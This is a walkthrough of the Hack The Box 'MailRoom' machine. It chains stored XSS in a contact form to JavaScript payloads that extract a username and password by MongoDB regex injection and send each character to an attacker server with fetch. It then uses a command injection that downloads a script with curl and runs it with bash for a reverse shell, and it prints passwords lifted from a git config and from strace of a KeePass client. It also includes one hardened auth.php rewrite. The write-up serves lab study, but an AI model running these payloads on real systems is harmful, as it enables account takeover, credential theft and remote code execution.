Reference: this uploader's videos:

Hack The Box seasonal machine [MailRoom] System Flag walkthrough_哔哩哔哩_bilibili

Hack The Box seasonal machine [MailRoom] User Flag walkthrough_哔哩哔哩_bilibili

Use the XSS in the message board to reach the internal web page (that page has a MongoDB regular-expression injection; the password is extracted blind, based on the HTTP status code returned)

git clone https://github.com/SrcVme50/Mailroom

guess_username.js

async function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);
            cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
        }
    };
    http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
    fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail);
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "");

guess_password.js

async function callAuth2(pass) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify2(pass);
            cal2("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~", pass);
        }
    };
    http.send("email=tristan@mailroom.htb&password[$regex]=^" + pass);
}
function notify2(pass) {
    fetch("http://10.10.14.50:30088/r8.sh?" + pass);
}
function cal2(chars, pass) {
    for (var i = 0; i < chars.length; i++) {
        callAuth2(pass + chars[i]);
    }
}
var chars99 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~";
cal2(chars99, "");
root@071381841c9e:/var/www/staffroom# cat auth.php
<?php
require 'vendor/autoload.php';
session_start(); // Start a session
$client = new MongoDB\Client("mongodb://mongodb:27017"); // Connect to the MongoDB database
header('Content-Type: application/json');
if (!$client) {
    header('HTTP/1.1 503 Service Unavailable');
    echo json_encode(['success' => false, 'message' => 'Failed to connect to the database']);
    exit;
}
$collection = $client->backend_panel->users; // Select the users collection

// Authenticate user & Send 2FA if valid
if (isset($_POST['email']) && isset($_POST['password'])) {
    // Verify the parameters are valid
    if (!is_string($_POST['email']) || !is_string($_POST['password'])) {
        header('HTTP/1.1 401 Unauthorized');
        echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
    }
    // Check if the email and password are correct
    $user = $collection->findOne(['email' => $_POST['email'], 'password' => $_POST['password']]);
    if ($user) {
        // Generate a random UUID for the 2FA token
        $token = bin2hex(random_bytes(16));
        $now = time();
        // Update the user record in the database with the 2FA token if not already sent in the last minute
        $user = $collection->findOne(['_id' => $user['_id']]);
        if (($user['2fa_token'] && ($now - $user['token_creation']) > 60) || !$user['2fa_token']) {
            $collection->updateOne(['_id' => $user['_id']], ['$set' => ['2fa_token' => $token, 'token_creation' => $now]]);
            // Send an email to the user with the 2FA token
            $to = $user['email'];
            $subject = '2FA Token';
            $message = 'Click on this link to authenticate: http://staff-review-panel.mailroom.htb/auth.php?token=' . $token;
            mail($to, $subject, $message);
        }
        // Return a JSON response notifying about 2fa
        echo json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);
        exit;
    } else {
        // Return a JSON error response
        header('HTTP/1.1 401 Unauthorized');
        echo json_encode(['success' => false, 'message' => 'Invalid email or password']);
    }
}
// Check for invalid parameters
else if (!isset($_GET['token'])) {
    header('HTTP/1.1 400 Bad Request');
    echo json_encode(['success' => false, 'message' => 'Email and password are required']);
    exit;
}
// Check if the form has been submitted
else if (isset($_GET['token'])) {
    // Verify Token parameter is valid
    if (!is_string($_GET['token']) || strlen($_GET['token']) !== 32) {
        header('HTTP/1.1 401 Unauthorized');
        echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
        exit;
    }
    // Check if the token is correct
    $user = $collection->findOne(['2fa_token' => $_GET['token']]);
    if ($user) {
        // Set the logged_in flag and name in the session
        $_SESSION['logged_in'] = true;
        $_SESSION['name'] = explode('@', $user['email'])[0];
        // Remove 2FA token since user already used it to log in
        $collection->updateOne(['_id' => $user['_id']], ['$unset' => ['2fa_token' => '']]);
        // Redirect to dashboard since login was successful
        header('Location: dashboard.php');
        exit;
    } else {
        // Return a JSON error response
        header('HTTP/1.1 401 Unauthorized');
        echo json_encode(['success' => false, 'message' => 'Invalid 2FA Login Token']);
        exit;
    }
}
?>
root@071381841c9e:/var/www/staffroom#
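The type check in auth.php above sets a 401 but never exits, so a request whose email or password is an array (the email[$regex]=... form this page uses) still reaches findOne, and the "headers already sent by ... auth.php:20" warning in the curl output further down is that missing exit showing up. Below is an added hardened replacement for the POST branch; it is not the box's code. It assumes the same $collection as the original and, as an assumption, that passwords are stored as password_hash() digests in a 'password_hash' field instead of being compared inside the query.

```php
<?php
// Added hardened replacement for the POST branch of auth.php; this is not the box's own code.
// Assumes the same $collection as the original and, as an assumption, that passwords are
// stored as password_hash() digests in a 'password_hash' field rather than compared in the query.
require 'vendor/autoload.php';
session_start();
header('Content-Type: application/json');
// Driver exceptions must not reach the client: the curl probes on this page read the
// PHP file path and line numbers straight out of the fatal-error text.
ini_set('display_errors', '0');

function fail(int $status, string $reason, string $message): void
{
    // Single exit point. The original set the 401 but fell through, so findOne still
    // ran on the attacker-controlled (array) input and a later header() call warned
    // "headers already sent by ... auth.php:20".
    header("HTTP/1.1 $status $reason");
    echo json_encode(['success' => false, 'message' => $message]);
    exit;
}

$client = new MongoDB\Client("mongodb://mongodb:27017");
$collection = $client->backend_panel->users;

if (isset($_POST['email'], $_POST['password'])) {
    $email = $_POST['email'];
    $password = $_POST['password'];

    // PHP turns email[$regex]=... into an array; arrays must never reach the driver.
    if (!is_string($email) || !is_string($password)) {
        fail(401, 'Unauthorized', 'Invalid input detected');
    }
    // Shape check on top of the type check.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false || strlen($password) > 256) {
        fail(401, 'Unauthorized', 'Invalid input detected');
    }

    // Query by the literal e-mail only: no user-supplied operator, no regular expression
    // whose compile error could leak paths, and the password never becomes a filter.
    $user = $collection->findOne(['email' => $email]);

    // Verify the password outside the query. A dummy hash keeps the bcrypt cost the same
    // for unknown users, so response time does not reveal whether the e-mail exists.
    $hash = $user !== null ? (string) $user['password_hash'] : password_hash('dummy', PASSWORD_DEFAULT);
    if (!password_verify($password, $hash) || $user === null) {
        fail(401, 'Unauthorized', 'Invalid email or password');
    }

    // ... the original's 2FA token generation, updateOne() and mail() continue here unchanged ...
    echo json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);
    exit;
}
```

With this shape the response for an array, a malformed address, an unknown user and a wrong password is the same 401 JSON body, so neither the regex error text nor the success flag can be used as a per-character oracle.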

# As below. This used to be http://10.10.14.37:77/user.js; I later found that Firefox refuses to connect to port 77, while high ports such as 8080 and 8090 are not restricted, so 77 was changed to 30088;

cd /tmp;
npm install -g http-server
# -g  --global  installs the module globally
http-server -p 30088 --cors=access-control-allow-origin &
curl -v -d 'email=123%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script>'   http://mailroom.htb/contact.php
# curl http://mailroom.htb/inquiries/a527e53f4ffd0574844e7483ba0904a9.html |grep -C5 10.10.14.50
POST /contact.php HTTP/1.1
Host: mailroom.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://mailroom.htb
Connection: close
Referer: http://mailroom.htb/contact.php
Upgrade-Insecure-Requests: 1

email=12342%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.37:30088/user.js"></script>
root@79585e1c3ddf:/var/www/mailroom/template# cat ai.py
#!/usr/bin/python3
# This script is used to simulate the Ai visiting the page and rating if the inquery looks relevent or irrelevant
import os
import sys
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service

# "Hack" to fix Firefox not launching without a writable home directory
os.environ["HOME"] = "/tmp"

def main(id):
    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Firefox(service=Service(executable_path='/var/www/mailroom/template/geckodriver', log_path='/dev/null'), options=options)
    driver.set_page_load_timeout(30)
    try:
        driver.get(f"http://127.0.0.1/inquiries/{id}.html")
        print(driver.title)
    finally:
        driver.close()

if __name__ == '__main__':
    if len(sys.argv) < 2 or len(sys.argv[1]) != 32:
        exit()
    main(sys.argv[1])
root@79585e1c3ddf:/var/www/mailroom/template#

The PHP file path can be leaked as follows:

root@mailroom:~#  curl -v -d "email[]=qwe&password[]=abc" http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 26
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 26 out of 26 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:19:20 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=58a2b1cce2a8d677a0f63c16d0fed89a; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 303
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/staffroom/auth.php:20) in <b>/var/www/staffroom/auth.php</b> on line <b>51</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
{"success":false,"message":"Invalid email or password"}
root@mailroom:~#
root@mailroom:~#
root@mailroom:~#  curl -v -d 'email[$regex]=.*)@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:24:00 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=9105dc031fc8878b739a6948f2d27b79; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 917
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: unmatched parentheses in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~# 

Regular expression is invalid: unmatched parentheses

parentheses: round brackets ( )

root@mailroom:~#  curl -v -d 'email[$regex]=.*(@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:27:33 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=87d6127a132d28b22f6e2336eb9e99e5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 905
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing ) in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#

Regular expression is invalid: missing )

curl -v -d 'email[$regex]=.*[@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;

<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing terminating ] for character class in /var...

The ai.py script seems to have a time limit (30-second timeout: driver.set_page_load_timeout(30)), so a single run does not necessarily recover the whole username and password; try several times, or edit the script by hand to continue from where the previous run stopped.

[2023-05-02T12:48:39.661Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:40.571Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:41.191Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:42.313Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:07.703Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:16.170Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.026Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.700Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:18.075Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:19.371Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:21.002Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:23.135Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:24.445Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:26.546Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:27.895Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:30.574Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:31.304Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:56.771Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:57.689Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:58.201Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:59.442Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:52:04.265Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

Keep looking for a way to stretch the 30-second limit:

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

The generated HTML contains two script loaders; the server behind the second one is PHP (http://10.10.14.50:8090/)

<script src='http://10.10.14.50:30088/guess_username.js'></script>

<script src='http://10.10.14.50:8090/?c=123'></script>

The content served at http://10.10.14.50:8090/?c=123 is:

echo "<?php set_time_limit(600);sleep(120);">/tmp/index.php ;

The command used to start PHP is:

cat /tmp/index.php ;
setsid php -n -S 0.0.0.0:8090 -t /tmp&

Built this way, the selenium instance on the server no longer exits so quickly.

Within 30 seconds the username can be guessed completely; the password is still a few characters short and would need a follow-up run (I did not bother with that; retrying a few times is enough):

[2023-05-02T15:39:12.945Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:19.952Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:20.744Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.258Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.683Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:23.333Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:24.978Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:26.546Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:54.784Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:55.901Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:56.770Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:57.557Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:59.597Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:02.004Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:04.039Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:06.605Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:08.711Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:10.680Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:11.877Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:14.318Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:20.160Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

ssh only allows tristan to log in:

grep Match /etc/ssh/sshd_config;

# ssh -o StrictHostKeyChecking=no root@10.10.11.209

# password:   a$gBa3!GA8

ssh -o StrictHostKeyChecking=no tristan@10.10.11.209

tristan's password: 69trisRulez!

After the ssh login succeeds:

# Send the login request with curl:
curl -v -d "email=tristan%40mailroom.htb&password=69trisRulez%21" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"    http://staff-review-panel.mailroom.htb/auth.php;
# Status 200 {"success":true,"message":"Check your inbox for an email with your 2FA token"}
grep -o -E "(http://.*)" /var/mail/tristan
# Take the last one:
myurl2=$(grep -o -E "(http://.*)" /var/mail/tristan|tail -n 1);
echo $myurl2;
# Visit the activation link from the mail:
#http://staff-review-panel.mailroom.htb/auth.php?token=2ae50255deba57587ac9f9555857beeb
curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" $myurl2|grep message
# Status 302, redirected to dashboard.php
# Visit the home page; this step can be skipped:
#curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/dashboard.php
# Inject the malicious command:
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

After the reverse shell comes back, it turns out to be inside a container; run the following one-liner to read the password:

cat /var/www/mailroom/.git/config /var/www/staffroom/.git/config

url = http://matthew:HueLover83%23@gitea:3000/matthew/mailroom.git

matthew's password is therefore:
HueLover83#

Back in the shell on the VM:

su - matthew

matthew@mailroom:~$ cat ~/user.txt
a371327b52dde700c969109e3315ac3c
matthew@mailroom:~$

ls -al /home/matthew/personal.kdbx;  python3 -V ;

Upload the password database to kali with scp; this step later turned out to be unnecessary, since the password can be cracked directly on the target with kpcli:

scp -P 40022 -o StrictHostKeyChecking=no \
/home/matthew/personal.kdbx root@10.10.14.37:/tmp/

Tip: the target is a VM that automatically wipes the files in /tmp, but hidden files whose names start with a dot are not deleted, so I save to .pwd.log under /tmp.

#  strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `

matthew@mailroom:/tmp$ ./ps  aux
PID   USER     TIME  COMMAND
42939 matthew   0:00 -bash
43013 matthew   0:00 /lib/systemd/systemd --user
43019 matthew   0:00 {kpcli} /usr/bin/perl /usr/bin/kpcli
43023 matthew   0:00 ./ps aux
matthew@mailroom:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
matthew    42939  0.2  0.1   8392  5148 pts/2    S    15:57   0:00 -bash
matthew    43013  0.6  0.2  19188  9764 ?        Ss   15:57   0:00 /lib/systemd/systemd --user
matthew    43019  1.2  0.6  29520 24468 ?        Ss   15:57   0:00 /usr/bin/perl /usr/bin/kpcli
matthew    43030  0.0  0.0   8888  3232 pts/2    R+   15:57   0:00 ps aux
matthew@mailroom:/tmp$ strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
strace: option requires an argument -- 'p'
Try 'strace -h' for more information.
matthew@mailroom:/tmp$
# This is because the process has not started yet; it is launched once every minute. Wait a moment and try again.

grep "read(0"  /tmp/.pwd.log |grep -v unavailable

#  grep -E "read|write" /tmp/.pwd.log|grep 8192 |grep read|grep -v unavailable

matthew@mailroom:/tmp$ grep 8192 /tmp/.pwd.log |grep "read(0"|grep -v unavailable
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
matthew@mailroom:/tmp$
root@fv-az345-528:/tmp# grep -E "read|write"   /tmp/123123.txt|grep 8192 |grep read|grep -v unavailable
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(5, "\npackage Compress::Raw::Zlib;\n\nr"..., 8192) = 8192
read(5, " if $validate && $value !~ /^\\d+"..., 8192) = 8192
read(5, "    croak \"Compress::Raw::Zlib::"..., 8192) = 8192
read(5, "# XML::Parser\n#\n# Copyright (c) "..., 8192) = 8192
read(6, "package XML::Parser::Expat;\n\nuse"..., 8192) = 8192
read(6, ";\n    }\n}\n\nsub position_in_conte"..., 8192) = 8192
read(5, "package MIME::Base64;\n\nuse stric"..., 8192) = 5450
read(6, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(6, "", 8192)                       = 0
read(7, "# NOTE: Derived from blib/lib/Te"..., 8192) = 665
read(7, "", 8192)                       = 0
root@fv-az345-528:/tmp#

\10 is the backspace (delete) key

From the above, the master password of the database is: !sEcUr3p4$$w0rd9

!sEcUr3p4$$w0rd9

As below: there is no need to install kpcli yourself; the target already has it and it can be used directly, which works just as well

keepass2 is a GUI tool; it is not needed this time

Installing keepass on ubuntu 20.04
sudo apt-add-repository ppa:jtaylor/keepass;\
sudo apt-get update && sudo apt-get upgrade;\
sudo apt-get install keepass2 -y;\
sudo apt install kpcli  -y;

Run keepass2
root@fv-az345-528:/tmp# keepass2 --version
KeePass 2.45
Copyright © 2003-2020 Dominik Reichl
root@fv-az345-528:/tmp#
kpcli  --kdb /tmp/personal.kdbx
ls
cd Root/
ls
show -f -a 4
quit

kpcli:/> cd Root/
kpcli:/Root> ls
